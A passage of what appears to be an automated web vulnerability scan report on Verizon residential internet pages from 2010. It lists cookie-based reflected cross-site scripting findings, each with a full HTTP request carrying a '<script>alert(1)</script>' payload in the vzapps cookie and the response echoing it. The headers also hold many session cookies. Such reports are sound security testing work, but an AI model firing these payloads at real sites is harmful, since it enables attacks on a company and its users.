WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71900
Expires: Sat, 20 Nov 2010 03:14:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4abd8<script>alert(1)</script>d0d4bb3410c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4ABD8<SCRIPT>ALERT(1)</SCRIPT>D0D4BB3410C </DIV>
...[SNIP]...

3.184. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff9'><script>alert(1)</script>5f319f2b2d3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fff9'><script>alert(1)</script>5f319f2b2d3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71904
Expires: Sat, 20 Nov 2010 00:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fff9'><script>alert(1)</script>5f319f2b2d3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FFF9'><SCRIPT>ALERT(1)</SCRIPT>5F319F2B2D3 ' />
...[SNIP]...

3.185. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 306e5<script>alert(1)</script>de57f988df3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX306e5<script>alert(1)</script>de57f988df3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71900
Expires: Sat, 20 Nov 2010 00:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX306e5<script>alert(1)</script>de57f988df3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX306E5<SCRIPT>ALERT(1)</SCRIPT>DE57F988DF3 </DIV>
...[SNIP]...

3.186. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65b09'><script>alert(1)</script>cb2218c31f2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX65b09'><script>alert(1)</script>cb2218c31f2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64444
Expires: Sat, 20 Nov 2010 03:13:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX65b09'><script>alert(1)</script>cb2218c31f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX65B09'><SCRIPT>ALERT(1)</SCRIPT>CB2218C31F2 ' />
...[SNIP]...

3.187. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1d1'><script>alert(1)</script>6e680d13017 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXbd1d1'><script>alert(1)</script>6e680d13017; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62999
Expires: Sat, 20 Nov 2010 03:14:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbd1d1'><script>alert(1)</script>6e680d13017; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBD1D1'><SCRIPT>ALERT(1)</SCRIPT>6E680D13017 ' />
...[SNIP]...

3.188. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>ece11e87003 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcdf59'><script>alert(1)</script>ece11e87003; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64487
Expires: Sat, 20 Nov 2010 00:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcdf59'><script>alert(1)</script>ece11e87003; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDF59'><SCRIPT>ALERT(1)</SCRIPT>ECE11E87003 ' />
...[SNIP]...

3.189. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9450<script>alert(1)</script>4aca6b8b3b4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc9450<script>alert(1)</script>4aca6b8b3b4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92711
Expires: Sat, 20 Nov 2010 03:15:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc9450<script>alert(1)</script>4aca6b8b3b4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC9450<SCRIPT>ALERT(1)</SCRIPT>4ACA6B8B3B4 </DIV>
...[SNIP]...

